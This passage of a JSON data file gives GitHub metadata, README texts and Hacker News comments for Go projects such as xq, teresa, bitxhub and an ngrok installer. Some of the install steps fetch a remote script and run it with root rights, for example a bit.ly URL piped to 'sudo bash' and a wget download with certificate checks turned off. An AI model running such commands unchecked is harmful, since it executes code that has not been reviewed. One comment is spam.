are\nthe DNS server is not running. This happens if your EC2 credentials are wrong.\n\n### Is the security group configured correctly?\nAssuming you can make DNS lookups to localhost, try running\n`dig dns1.aws.example.com @ec2-12-34-56-78.compute-1.amazonaws.com` from your\nlaptop. If you don't get a reply, double check the security group config.\n\n### Are the NS records set up correctly?\nAssuming you can make DNS lookups correctly when pointing dig at the DNS\nserver, try running `dig NS aws.example.com`. If this doesn't return anything,\nyou probably need to update your `NS` records. If you've already done this, you\nmight need to wait a few minutes for caches to clear.\n\n### Are you getting a warning about NS records in the logs but everything seems fine?\nThis happens when the `--hostname` parameter has been set or auto-detected to\nsomething different from what you've configured the `NS` records to be. This\nmay cause hard-to-debug issues, so you should set `--hostname` correctly.\n", "readme_type": "markdown", "hn_comments": "This is very cool! I love the idea of having a structured way to incorporate tags and roles into DNS aliases.However, since DNS is just about the most critical infrastructure service you can have, I want to point out that most of this can be accomplished nowadays with Route 53 internal DNS by syncing tags and roles into CNAMEs on Route 53.The difference to me is that even if your syncing daemon goes down, your DNS is still up (it's hard to imagine a situation where Route 53 is down without something even more fundamental being down on EC2).Need to add \"in Go\" to the title to get to the top of HN :-)What is the performance like? When you receive a DNS query for an instance that the API hasn't cached, what happens to the latency?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "meshplus/bitxhub", "link": "https://github.com/meshplus/bitxhub", "tags": ["blockchain", "interoperability", "relay-chain", "ibtp"], "stars": 556, "description": "Interchain protocol \u8de8\u94fe\u534f\u8bae", "lang": "Go", "repo_lang": "", "readme": "

\n \n

\n\n![build](https://github.com/meshplus/bitxhub/workflows/build/badge.svg)\n[![codecov](https://codecov.io/gh/meshplus/bitxhub/branch/master/graph/badge.svg)](https://codecov.io/gh/meshplus/bitxhub)\n[![Go Report Card](https://goreportcard.com/badge/github.com/meshplus/bitxhub)](https://goreportcard.com/report/github.com/meshplus/bitxhub)\n\nBitXHub is committed to building a scalable, robust, and pluggable inter-blockchain\nreference implementation, that can provide reliable technical support for the formation\nof a blockchain internet and intercommunication of value islands.\n\n**For more details please visit our [documentation](https://docs.bitxhub.cn/) and [whitepaper](https://upload.hyperchain.cn/BitXHub%20Whitepaper.pdf) | [\u767d\u76ae\u4e66](https://upload.hyperchain.cn/BitXHub%E7%99%BD%E7%9A%AE%E4%B9%A6.pdf).**\n\n## Start\n\nBitXHub start script relies on [golang](https://golang.org/) and [tmux](https://github.com/tmux/tmux/wiki). Please\ninstall the software before start.\n\nUse commands below to clone the project:\n\n```shell\ngit clone git@github.com:meshplus/bitxhub.git\n```\n\nBitXHub also relies on some small tools, use commands below to install:\n\n```shell\ncd bitxhub\nbash scripts/prepare.sh \n```\n\nFinally, run the following commands to start a four nodes relay-chain.\n\n```shell\nmake cluster\n```\n\n**Noting:** `make cluster` will use `tmux` to split the screen. Thus, during commands processing, better not switch the terminal.\n\n## Playground\nSimply go to [BitXHub Document](https://meshplus.github.io/bitxhub/bitxhub/quick_start/) and follow the tutorials.\n\n\n## Contributing\n\nSee [CONTRIBUTING.md](https://github.com/meshplus/bitxhub/blob/master/CONTRIBUTING.md).\n\n## Contact\n\nEmail: bitxhub@hyperchain.cn\n\nWechat: If you\u2018re interested in BitXHub, please add the assistant to join our community group.\n\n\n\n## License\n\nThe BitXHub library (i.e. all code outside of the cmd and internal directory) is licensed under the GNU Lesser General Public License v3.0, also included in our repository in the COPYING.LESSER file.\n\nThe BitXHub binaries (i.e. all code inside of the cmd and internal directory) is licensed under the GNU General Public License v3.0, also included in our repository in the COPYING file.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fatih/structtag", "link": "https://github.com/fatih/structtag", "tags": ["go", "structs", "tags"], "stars": 555, "description": "Parse and modify Go struct field tags", "lang": "Go", "repo_lang": "", "readme": "# structtag [![](https://github.com/fatih/structtag/workflows/build/badge.svg)](https://github.com/fatih/structtag/actions) [![PkgGoDev](https://pkg.go.dev/badge/github.com/fatih/structtag)](https://pkg.go.dev/github.com/fatih/structtag)\n\nstructtag provides a way of parsing and manipulating struct tag Go fields. It's used by tools like [gomodifytags](https://github.com/fatih/gomodifytags). For more examples, checkout [the projects using structtag](https://pkg.go.dev/github.com/fatih/structtag?tab=importedby).\n\n# Install\n\n```bash\ngo get github.com/fatih/structtag\n```\n\n# Example\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"reflect\"\n\t\"sort\"\n\n\t\"github.com/fatih/structtag\"\n)\n\nfunc main() {\n\ttype t struct {\n\t\tt string `json:\"foo,omitempty,string\" xml:\"foo\"`\n\t}\n\n\t// get field tag\n\ttag := reflect.TypeOf(t{}).Field(0).Tag\n\n\t// ... and start using structtag by parsing the tag\n\ttags, err := structtag.Parse(string(tag))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// iterate over all tags\n\tfor _, t := range tags.Tags() {\n\t\tfmt.Printf(\"tag: %+v\\n\", t)\n\t}\n\n\t// get a single tag\n\tjsonTag, err := tags.Get(\"json\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(jsonTag) // Output: json:\"foo,omitempty,string\"\n\tfmt.Println(jsonTag.Key) // Output: json\n\tfmt.Println(jsonTag.Name) // Output: foo\n\tfmt.Println(jsonTag.Options) // Output: [omitempty string]\n\n\t// change existing tag\n\tjsonTag.Name = \"foo_bar\"\n\tjsonTag.Options = nil\n\ttags.Set(jsonTag)\n\n\t// add new tag\n\ttags.Set(&structtag.Tag{\n\t\tKey: \"hcl\",\n\t\tName: \"foo\",\n\t\tOptions: []string{\"squash\"},\n\t})\n\n\t// print the tags\n\tfmt.Println(tags) // Output: json:\"foo_bar\" xml:\"foo\" hcl:\"foo,squash\"\n\n\t// sort tags according to keys\n\tsort.Sort(tags)\n\tfmt.Println(tags) // Output: hcl:\"foo,squash\" json:\"foo_bar\" xml:\"foo\"\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "swaggo/echo-swagger", "link": "https://github.com/swaggo/echo-swagger", "tags": ["golang", "middleware", "swagger2", "echo", "echo-framework"], "stars": 555, "description": "echo middleware to automatically generate RESTful API documentation with Swagger 2.0.", "lang": "Go", "repo_lang": "", "readme": "# echo-swagger\n\necho middleware to automatically generate RESTful API documentation with Swagger 2.0.\n\n[![Build Status](https://github.com/swaggo/echo-swagger/actions/workflows/ci.yml/badge.svg?branch=master)](https://github.com/features/actions)\n[![Codecov branch](https://img.shields.io/codecov/c/github/swaggo/echo-swagger/master.svg)](https://codecov.io/gh/swaggo/echo-swagger)\n[![Go Report Card](https://goreportcard.com/badge/github.com/swaggo/echo-swagger)](https://goreportcard.com/report/github.com/swaggo/echo-swagger)\n[![Release](https://img.shields.io/github/release/swaggo/echo-swagger.svg?style=flat-square)](https://github.com/swaggo/echo-swagger/releases)\n\n\n## Usage\n\n### Start using it\n1. Add comments to your API source code, [See Declarative Comments Format](https://github.com/swaggo/swag#declarative-comments-format).\n2. Download [Swag](https://github.com/swaggo/swag) for Go by using:\n```sh\n$ go get -d github.com/swaggo/swag/cmd/swag\n\n# 1.16 or newer\n$ go install github.com/swaggo/swag/cmd/swag@latest\n```\n3. Run the [Swag](https://github.com/swaggo/swag) in your Go project root folder which contains `main.go` file, [Swag](https://github.com/swaggo/swag) will parse comments and generate required files(`docs` folder and `docs/doc.go`).\n```sh_ \"github.com/swaggo/echo-swagger/v2/example/docs\"\n$ swag init\n```\n4. Download [echo-swagger](https://github.com/swaggo/echo-swagger) by using:\n```sh\n$ go get -u github.com/swaggo/echo-swagger\n```\n\nAnd import following in your code:\n```go\nimport \"github.com/swaggo/echo-swagger\" // echo-swagger middleware\n```\n\n### Canonical example:\n\n```go\npackage main\n\nimport (\n\t\"github.com/labstack/echo/v4\"\n\t\"github.com/swaggo/echo-swagger\"\n\n\t_ \"github.com/swaggo/echo-swagger/example/docs\" // docs is generated by Swag CLI, you have to import it.\n)\n\n// @title Swagger Example API\n// @version 1.0\n// @description This is a sample server Petstore server.\n// @termsOfService http://swagger.io/terms/\n\n// @contact.name API Support\n// @contact.url http://www.swagger.io/support\n// @contact.email support@swagger.io\n\n// @license.name Apache 2.0\n// @license.url http://www.apache.org/licenses/LICENSE-2.0.html\n\n// @host petstore.swagger.io\n// @BasePath /v2\nfunc main() {\n\te := echo.New()\n\n\te.GET(\"/swagger/*\", echoSwagger.WrapHandler)\n\n\te.Logger.Fatal(e.Start(\":1323\"))\n}\n\n```\n\n5. Run it, and browser to http://localhost:1323/swagger/index.html, you can see Swagger 2.0 Api documents.\n\n![swagger_index.html](https://user-images.githubusercontent.com/8943871/36250587-40834072-1279-11e8-8bb7-02a2e2fdd7a7.png)\n\nNote: If you are using Gzip middleware you should add the swagger endpoint to skipper\n\n### Example\n\n```\ne.Use(middleware.GzipWithConfig(middleware.GzipConfig{\n\t\tSkipper: func(c echo.Context) bool {\n\t\t\tif strings.Contains(c.Request().URL.Path, \"swagger\") {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\treturn false\n\t\t},\n\t}))\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "leanovate/gopter", "link": "https://github.com/leanovate/gopter", "tags": ["golang", "property-based-testing", "golang-property-tester"], "stars": 555, "description": "GOlang Property TestER", "lang": "Go", "repo_lang": "", "readme": "# GOPTER\n\n... the GOlang Property TestER\n[![Build Status](https://travis-ci.org/leanovate/gopter.svg?branch=master)](https://travis-ci.org/leanovate/gopter)\n[![codecov](https://codecov.io/gh/leanovate/gopter/branch/master/graph/badge.svg)](https://codecov.io/gh/leanovate/gopter)\n[![GoDoc](https://godoc.org/github.com/leanovate/gopter?status.png)](https://godoc.org/github.com/leanovate/gopter)\n[![Go Report Card](https://goreportcard.com/badge/github.com/leanovate/gopter)](https://goreportcard.com/report/github.com/leanovate/gopter)\n\n[Change Log](CHANGELOG.md)\n\n## Synopsis\n\nGopter tries to bring the goodness of [ScalaCheck](https://www.scalacheck.org/) (and implicitly, the goodness of [QuickCheck](http://hackage.haskell.org/package/QuickCheck)) to Go.\nIt can also be seen as a more sophisticated version of the testing/quick package.\n\nMain differences to ScalaCheck:\n\n* It is Go ... duh\n* ... nevertheless: Do not expect the same typesafety and elegance as in ScalaCheck.\n* For simplicity [Shrink](https://www.scalacheck.org/files/scalacheck_2.11-1.14.0-api/index.html#org.scalacheck.Shrink) has become part of the generators. They can still be easily changed if necessary.\n* There is no [Pretty](https://www.scalacheck.org/files/scalacheck_2.11-1.14.0-api/index.html#org.scalacheck.util.Pretty) ... so far gopter feels quite comfortable being ugly.\n* A generator for regex matches\n* No parallel commands ... yet?\n\nMain differences to the testing/quick package:\n\n* Much tighter control over generators\n* Shrinkers, i.e. automatically find the minimum value falsifying a property\n* A generator for regex matches (already mentioned that ... but it's cool)\n* Support for stateful tests\n\n## Documentation\n\nCurrent godocs:\n\n* [gopter](https://godoc.org/github.com/leanovate/gopter): Main interfaces\n* [gopter/gen](https://godoc.org/github.com/leanovate/gopter/gen): All commonly used generators\n* [gopter/prop](https://godoc.org/github.com/leanovate/gopter/prop): Common helpers to create properties from a condition function and specific generators\n* [gopter/arbitrary](https://godoc.org/github.com/leanovate/gopter/arbitrary): Helpers automatically combine generators for arbitrary types\n* [gopter/commands](https://godoc.org/github.com/leanovate/gopter/commands): Helpers to create stateful tests based on arbitrary commands\n* [gopter/convey](https://godoc.org/github.com/leanovate/gopter/convey): Helpers used by gopter inside goconvey tests\n\n## License\n\n[MIT Licence](http://opensource.org/licenses/MIT)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sibprogrammer/xq", "link": "https://github.com/sibprogrammer/xq", "tags": ["terminal", "xml", "syntax-highlighting", "xpath", "html", "formatter"], "stars": 555, "description": "Command-line XML and HTML beautifier and content extractor", "lang": "Go", "repo_lang": "", "readme": "# xq\n\n[![build](https://github.com/sibprogrammer/xq/workflows/build/badge.svg)](https://github.com/sibprogrammer/xq/actions)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sibprogrammer/xq)](https://goreportcard.com/report/github.com/sibprogrammer/xq)\n[![Codecov](https://codecov.io/gh/sibprogrammer/xq/branch/master/graph/badge.svg?token=G6QX77SQOH)](https://codecov.io/gh/sibprogrammer/xq)\n[![Homebrew](https://img.shields.io/badge/dynamic/json.svg?url=https://formulae.brew.sh/api/formula/xq.json&query=$.versions.stable&label=homebrew)](https://formulae.brew.sh/formula/xq)\n[![Macports](https://repology.org/badge/version-for-repo/macports/xq-sibprogrammer.svg)](https://repology.org/project/xq-sibprogrammer/versions)\n\nCommand-line XML and HTML beautifier and content extractor.\n\n![xq](./assets/images/screenshot.png?raw=true)\n\n# Features\n\n* Syntax highlighting\n* Automatic indentation and formatting\n* Automatic pagination\n* Node content extraction\n\n# Usage\n\nFormat an XML file and highlight the syntax:\n\n```\nxq test/data/xml/unformatted.xml\n```\n\n`xq` also accepts input through `stdin`:\n\n```\ncurl -s https://www.w3schools.com/xml/note.xml | xq\n```\n\nHTML content can be formatted and highlighted as well (using `-m` flag):\n\n```\nxq -m test/data/html/formatted.html\n```\n\nIt is possible to extract the content using XPath query language.\n`-x` parameter accepts XPath expression.\n\nExtract the text content of all nodes with `city` name:\n\n```\ncat test/data/xml/unformatted.xml | xq -x //city\n```\n\nExtract the value of attribute named `status` and belonging to `user`:\n\n```\ncat test/data/xml/unformatted.xml | xq -x /user/@status\n```\n\nSee https://en.wikipedia.org/wiki/XPath for details.\n\nIt is possible to use CSS selector to extract the content as well:\n\n```\ncat test/data/html/unformatted.html | xq -q \"body > p\"\n```\n\n# Installation\n\nThe preferable ways to install the utility are described below.\n\nFor macOS, via [Homebrew](https://brew.sh):\n```\nbrew install xq\n```\n\nFor macOS, via [MacPorts](https://www.macports.org):\n```\nsudo port install xq\n```\n\nFor Linux using custom installer:\n```\ncurl -sSL https://bit.ly/install-xq | sudo bash\n```\n\nFor Ubuntu 22.10 or higher via package manager:\n```\napt-get install xq\n```\n\nFor Fedora via package manager:\n```\ndnf install xq\n```\n\nIf you have Go toolchain installed, you can use the following command to install `xq`:\n```\ngo install github.com/sibprogrammer/xq@latest\n```\n", "readme_type": "markdown", "hn_comments": "I got the best questions that are in demand from JavaScript one of the most languages out there and if you can solve these questions you can get your job, but if you can't they provide you free courses step by step it depends on your level in order to become a programmer and good luck :)\nLearn more: https://javascript.spread.namexmllint --format -xsltprocSo there are now approximately 1 million command line tools with various overlapping feature sets for extracting data from XML, JSON, YAML, TOML, and CSV-like delimited data. Is anyone ambitious enough to have constructed a feature matrix for all of them? Is there even a complete list out there?I wonder if this space of tools is a bit like static site generators: it's almost as easy to write your own as it is to learn somebody else's.Neat! Like Jq but for XML and HTML.Have you considered adding css sectors as an alternative to xpath? For many simple things a css selector is easer to write and more people already know them.I believe it's possible to translate css selectors to xpath so it wouldn't need another selection engine.There's an ancient formatter I've been using for years (gasp, probably well over a decade) https://xml-coreutils.sourceforge.net/ ... xml-fmt (https://xml-coreutils.sourceforge.net/xml-fmt_man.html)It'll be nice to try something new. swiss army style command line XML tools has been pretty neglected.There is also hred \nhttps://github.com/danburzo/hredWhich extracts XML and HTML as JSON.Also cool: \nhttps://github.com/dbohdan/structured-text-tools/ \n\"A list of command line tools for manipulating structured text data\"There is also yq [1], which attempts the same for yaml, toml and xml. (And confusingly also contains a binary named \"xq\" for the xml part - however, it uses jq for querying instead of xpath)[1] https://github.com/kislyuk/yqThis is awesome. Hugo has been missing a tidy feature for a long time. I hope they use this to implement it finally or that the author might even consider creating a PR.related discussion, orthogonally:JC \u2013 JSONifies the output of many CLI toolshttps://news.ycombinator.com/item?id=33448204 2022-11-03doesn't seem to work great with https://ap-playerservices.streamtheworld.com/api/livestream?station=NOVA_919&version=1.9\n\nso xqilla and learning xlst et al still seems like my to-go for complex documentsShoutout to my go-to: https://github.com/EricChiang/pup#readme (also golang) and my 2nd favorite https://xmlstar.sourceforge.net/Looks good! Does the xpath expression support XML namespaces?What would be the differences to lxml/beautifulsoup/etc.? curl https://news.ycombinator.com/ | xq\n\nyields: Hacker NewsXML syntax error on line 4: element closed by \n1", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "luizalabs/teresa", "link": "https://github.com/luizalabs/teresa", "tags": ["kubernetes", "go", "paas", "hacktoberfest"], "stars": 555, "description": "Open source tool to deploy apps to Kubernetes clusters", "lang": "Go", "repo_lang": "", "readme": "# Teresa\n[![Release](https://img.shields.io/github/release/luizalabs/teresa.svg?style=flat-square)](https://github.com/luizalabs/teresa/releases/latest)\n[![Software License](https://img.shields.io/badge/license-apache-brightgreen.svg?style=flat-square)](/LICENSE.md)\n[![Build Status](https://img.shields.io/travis/luizalabs/teresa/master.svg?style=flat-square)](https://travis-ci.org/luizalabs/teresa)\n[![codecov](https://img.shields.io/codecov/c/github/luizalabs/teresa/master.svg?style=flat-square\")](https://codecov.io/gh/luizalabs/teresa)\n[![Go Report Card](https://goreportcard.com/badge/github.com/luizalabs/teresa?style=flat-square)](https://goreportcard.com/report/github.com/luizalabs/teresa)\n\nTeresa is an extremely simple platform as a service that runs on top of [Kubernetes](https://github.com/kubernetes/kubernetes).\nIt uses a client-server model: the client sends high level commands (create application, deploy, etc.) to the server, which translates them to the Kubernetes API.\n\n## Client Installation\n\n### Download (recommended)\n\nThis is the best way to get the latest release.\n\n- Access https://github.com/luizalabs/teresa/releases\n- Download the latest release for your OS. Eg: `teresa-linux-amd64`\n- Rename the download file to `teresa`. Eg: `mv teresa-linux-amd64 teresa`\n- Make it an executable. Eg: `chmod +x teresa`\n- Move it to the `bin` folder. Eg: `sudo mv teresa /usr/bin`\n\nThen you're good to go :slightly_smiling_face: ! `teresa` should now be available to use on your terminal.\n\n### Homebrew\n\nRun the following in your command-line:\n\n```sh\n$ brew tap luizalabs/teresa-cli\n$ brew install teresa\n```\n\n### Snap\n\nRun the following in your command-line:\n\n```sh\n$ sudo snap install teresa-cli\n```\n\n## Server Installation\n\nServer requirements:\n\n- Kubernetes cluster (>= 1.9)\n\n- database backend to store users and teams (SQLite or MySQL)\n\n- storage for build artifacts (AWS S3 or minio)\n\n- rsa keys for token signing\n\n- (optional) TLS encryption key and certificate\n\nThe recommended installation method uses the [helm](https://github.com/kubernetes/helm) package manager,\nfor instance to install using S3 and MySQL (recommended):\n\n $ openssl genrsa -out teresa.rsa\n $ export TERESA_RSA_PRIVATE=`base64 -w0 teresa.rsa`\n $ openssl rsa -in teresa.rsa -pubout > teresa.rsa.pub\n $ export TERESA_RSA_PUBLIC=`base64 -w0 teresa.rsa.pub`\n $ helm repo add luizalabs http://helm.k8s.magazineluiza.com\n $ helm install luizalabs/teresa \\\n --namespace teresa \\\n --set rsa.private=$TERESA_RSA_PRIVATE \\\n --set rsa.public=$TERESA_RSA_PUBLIC \\\n --set aws.key.access=xxxxxxxx \\\n --set aws.key.secret=xxxxxxxx \\\n --set aws.region=us-east-1 \\\n --set aws.s3.bucket=teresa \\\n --set db.name=teresa \\\n --set db.hostname=dbhostname \\\n --set db.username=teresa \\\n --set db.password=xxxxxxxx \\\n --set rbac.enabled=true\n\n\nLook [here](./helm/README.md) for more information about helm options.\n\nYou need to create an admin user to perform [user and team management](./FAQ.md#administration):\n\n $ export POD_NAME=$(kubectl get pods -n teresa -l \"app=teresa\" -o jsonpath=\"{.items[0].metadata.name}\")\n $ kubectl exec $POD_NAME -it -n teresa -- ./teresa-server create-super-user --email admin@email.com --password xxxxxxxx\n\n## QuickStart\n\nRead the first sections of the [FAQ](./FAQ.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clangcn/ngrok-one-key-install", "link": "https://github.com/clangcn/ngrok-one-key-install", "tags": [], "stars": 555, "description": "ngrok one key install shell(http://soft.clang.cn/ngrok/install_ngrok.sh)", "lang": "Go", "repo_lang": "", "readme": "#Ngrok\u670d\u52a1\u5668\u4e00\u952e\u5b89\u88c5\u811a\u672c\u3010\u652f\u6301\u7528\u6237\u7ba1\u7406\u3011\uff08\u7a7f\u900fDDNS\uff09\n\n##\u5728\u6b64\u975e\u5e38\u611f\u8c22[koolshare](http://koolshare.cn/forum-72-1.html)\u7684[\u5c0f\u5b9d](http://koolshare.cn/space-uid-2380.html)\u5b9d\u5927\u5bf9ngrok\u8fdb\u884c\u7684\u4e8c\u6b21\u5f00\u53d1\uff0c\u8ba9\u6211\u7b49\u53ef\u4ee5\u7528\u4e0a\u975e\u5e38\u597d\u7528\u7684\u7a0b\u5e8f\uff0c\u540c\u65f6\u611f\u8c22[woaihsw](http://koolshare.cn/space-uid-13735.html)\u5728\u811a\u672c\u5236\u4f5c\u4e2d\u63d0\u4f9b\u7684\u5e2e\u52a9\u3002\n\n\u811a\u672c\u662f\u4e1a\u4f59\u7231\u597d\uff0c\u82f1\u6587\u5c5e\u4e8e\u6587\u76f2\uff0c\u5199\u7684\u4e0d\u597d\uff0c\u4e0d\u8981\u7b11\u8bdd\u6211\uff0c\u6b22\u8fce\u60a8\u6279\u8bc4\u6307\u6b63\u3002\n\u5b89\u88c5\u5e73\u53f0\uff1aCentOS\u3001Debian\u3001Ubuntu\u3002\nServer\n------\n### Install\n\u6267\u884c\u547d\u4ee4\uff1a\n```Bash\nwget --no-check-certificate https://github.com/clangcn/ngrok-one-key-install/raw/master/install_ngrok.sh -O ./install_ngrok.sh\nchmod 500 ./install_ngrok.sh\n./install_ngrok.sh install\t\n```\n### \u670d\u52a1\u5668\u7ba1\u7406\n\n\tUsage: /etc/init.d/ngrokd {start|stop|restart|status|config|adduser|deluser|userlist|info}\n\tUsage: /etc/init.d/ngrokd deluser {username}\n\n~~*### \u81ea\u5df1\u7f16\u8bd1\u5b89\u88c5*~~\n\n~~*\u6267\u884c\u547d\u4ee4:*~~\n~~*wget --no-check-certificate https://github.com/clangcn/ngrok-one-key-install/raw/master/ngrok_install.sh -O ./ngrok_install.sh*~~\n~~*chmod 500 ./ngrok_install.sh*~~\n~~*./ngrok_install.sh*~~\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "iost-official/go-iost", "link": "https://github.com/iost-official/go-iost", "tags": ["blockchain", "iost", "smart-contracts", "dapp"], "stars": 555, "description": "Official Go implementation of the IOST blockchain", "lang": "Go", "repo_lang": "", "readme": "# IOST - A Scalable & Developer Friendly Blockchain \n\nIOST is a smart contract platform focusing on performance and developer friendliness. \n\n# Features\n\n1. The V8 JavaScript engine is integrated inside the blockchain, so you can use JavaScript to write smart contracts!\n2. The blockchain is highly scalable with thousands of TPS. Meanwhile it still has a more decentralized consensus than DPoS.\n3. 0.5 second block, 0.5 minute finality.\n4. Free transactions. You can stake coins to get gas.\n\n# Development\n\n### Environments\n\nOS: Ubuntu 18.04 or later \nGo: 1.18 or later\n\nIOST node uses CGO V8 javascript engine, so only x64 is supported now.\n\n### Deployment\n\nbuild local binary: `make build` \nstart a local devnet: `make debug` \nbuild docker: `make image` \n\n\nFor documentation, please visit: [IOST Developer](https://developers.iost.io)\n\nWelcome to our [tech community at telegram](https://t.me/iostdev)\n\nHappy hacking!\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nivin-studio/go-zero-mall", "link": "https://github.com/nivin-studio/go-zero-mall", "tags": [], "stars": 555, "description": "go-zero\u5b9e\u6218\uff1a\u8ba9\u5fae\u670d\u52a1Go\u8d77\u6765", "lang": "Go", "repo_lang": "", "readme": "# go-zero\u5b9e\u6218\uff1a\u8ba9\u5fae\u670d\u52a1Go\u8d77\u6765\n\u8fd9\u662f\u4e00\u4e2a `go-zero` \u5165\u95e8\u5b66\u4e60\u6559\u7a0b\u7684\u793a\u4f8b\u4ee3\u7801\uff0c\u6559\u7a0b\u5730\u5740\uff1a[go-zero\u5b9e\u6218\uff1a\u8ba9\u5fae\u670d\u52a1Go\u8d77\u6765](https://juejin.cn/post/7036011047391592485)\u3002\n\n`DTM` \u5206\u5e03\u5f0f\u4e8b\u52a1\u793a\u4f8b\u4ee3\u7801\u8bf7\u5207\u6362\u81f3 [dtm](https://github.com/nivin-studio/go-zero-mall/tree/dtm) \u5206\u652f\u3002\n\n## \u4f7f\u7528\n\n### 1. `docker` \u672c\u5730\u5f00\u53d1\u73af\u5883\u5b89\u88c5\n\u4e0b\u8f7d [gonivinck](https://github.com/nivin-studio/gonivinck) \u672c\u5730\u5f00\u53d1\u73af\u5883.\n\n### 2. \u6570\u636e\u5e93\u521b\u5efa\n\u5730\u5740\uff1a`127.0.0.1:3306`\n\n\u7528\u6237\uff1a`root`\n\n\u5bc6\u7801\uff1a`123456`\n\n\u521b\u5efa\u6570\u636e\u5e93 `mall`\n\n\u521b\u5efa\u6570\u636e\u8868 `user`\u3001`product`\u3001`order`\u3001`pay`\n\n`SQL`\u8bed\u53e5\u5728 `service/[user,product,order,pay]/model` \u76ee\u5f55\u4e0b\u3002\n\n> \u63d0\u793a\uff1a\u5982\u679c\u4f60\u4fee\u6539 gonivinck \u76f8\u5173 mysql \u914d\u7f6e\uff0c\u8bf7\u4f7f\u7528\u4f60\u4fee\u6539\u7684\u7aef\u53e3\u53f7\uff0c\u8d26\u53f7\uff0c\u5bc6\u7801\u8fde\u63a5\u8bbf\u95ee\u6570\u636e\u5e93\u3002\n\n### 3. \u9879\u76ee\u542f\u52a8\n\u4e0b\u8f7d\u672c\u9879\u76ee\uff0c\u5c06\u9879\u76ee\u4ee3\u7801\u653e\u7f6e `gonivinck` \u914d\u7f6e `CODE_PATH_HOST` \u6307\u5b9a\u7684\u672c\u673a\u76ee\u5f55\uff0c\u8fdb\u5165 `golang` \u5bb9\u5668\uff0c\u8fd0\u884c\u9879\u76ee\u4ee3\u7801\u3002\n\n#### 3.1 \u8fdb\u5165 `golang` \u5bb9\u5668\n~~~bash\n$ docker exec -it gonivinck_golang_1 bash\n~~~\n\n#### 3.2 \u4f7f\u7528 `nivin` \u547d\u4ee4\u5de5\u5177\n\n- nivin install\n\u5b89\u88c5\u9879\u76ee\u4f9d\u8d56\u547d\u4ee4\u3002\n\n~~~bash\n$ ./nivin install\n~~~\n\n- nivin start [rpc|api] [service_name]\n\u670d\u52a1\u542f\u52a8\u547d\u4ee4\uff0c\u521b\u5efa\u670d\u52a1\u4f1a\u8bdd\uff0c\u5e76\u542f\u52a8\u5bf9\u5e94\u7684\u670d\u52a1\u3002\n \n~~~bash\n$ ./nivin start rpc user\n~~~\n\n~~~bash\n$ ./nivin start api user\n~~~\n\n- nivin stop [rpc|api] [service_name]\n\u670d\u52a1\u6682\u505c\u547d\u4ee4\uff0c\u5220\u9664\u5bf9\u5e94\u7684\u670d\u52a1\u4f1a\u8bdd\u3002\n \n~~~bash\n$ ./nivin stop rpc user\n~~~\n\n~~~bash\n$ ./nivin stop api user\n~~~\n\n- nivin info [rpc|api] [service_name]\n\u670d\u52a1\u67e5\u770b\u547d\u4ee4\uff0c\u53ef\u4ee5\u8fdb\u5165\u670d\u52a1\u5bf9\u5e94\u7684\u4f1a\u8bdd\u7ec8\u7aef\uff0c\u67e5\u770b\u8fd0\u884c\u65e5\u5fd7\u3002\n\n~~~bash\n$ ./nivin info rpc user\n~~~\n\n~~~bash\n$ ./nivin info api user\n~~~\n\n> \u63d0\u793a\uff1a\u4f7f\u7528 ctrl+a+d \u7ec4\u5408\u5feb\u6377\u952e\uff0c\u53ef\u4ee5\u65e0\u635f\u9000\u51fa\u6b64\u4f1a\u8bdd\uff0c\u4e0d\u4f1a\u4e2d\u6b62\u4f1a\u8bdd\u4e2d\u8fd0\u884c\u7684\u670d\u52a1\u3002\n\n- nivin ls\n\u670d\u52a1\u4f1a\u8bdd\u5217\u8868\uff0c\u67e5\u770b\u542f\u52a8\u7684\u670d\u52a1\u4f1a\u8bdd\u5217\u8868\u3002\n \n~~~bash\n$ ./nivin ls\n~~~\n\n\n## \u611f\u8c22\n\n- [go-zero](https://github.com/zeromicro/go-zero)\n- [DTM](https://github.com/dtm-labs/dtm)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "crosbymichael/slex", "link": "https://github.com/crosbymichael/slex", "tags": ["ssh", "multiplexing"], "stars": 554, "description": "SSH multiplex", "lang": "Go", "repo_lang": "", "readme": "## SLEX\n\n[![Build Status](https://travis-ci.org/crosbymichael/slex.svg?branch=master)](https://travis-ci.org/crosbymichael/slex)\n\nslex is a simple binary that allows you to run a command on multiple hosts via SSH.\nIt is very similar to fabric except that it is written in Go so you don't have to \nhave python installed on your system and you don't *have* to write a script or \nconfiguration files if you do not want to.\n\n## Building\n\nTo build `slex` you must have a working Go install then you can run:\n\n```bash\ngo get -u github.com/crosbymichael/slex\n```\n\n```bash\nslex -h\nNAME:\n slex - SSH commands multiplexed\n\nUSAGE:\n slex [global options] command [command options] [arguments...]\n\nVERSION:\n 1\n\nAUTHOR:\n @crosbymichael - \n\nCOMMANDS:\n help, h Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n --debug enable debug output for the logs\n --host value SSH host address\n --hosts value file containing host addresses separated by a new line\n --user value, -u value user to execute the command as (default: \"root\")\n --identity value, -i value SSH identity to use for connecting to the host\n --option value, -o value SSH client option\n --agent, -A Forward authentication request to the ssh agent\n --env value, -e value set environment variables for SSH command\n --quiet, -q disable output from the ssh command\n --help, -h show help\n --version, -v print the version\n\n```\n\nFor the list of supported SSH client option, see 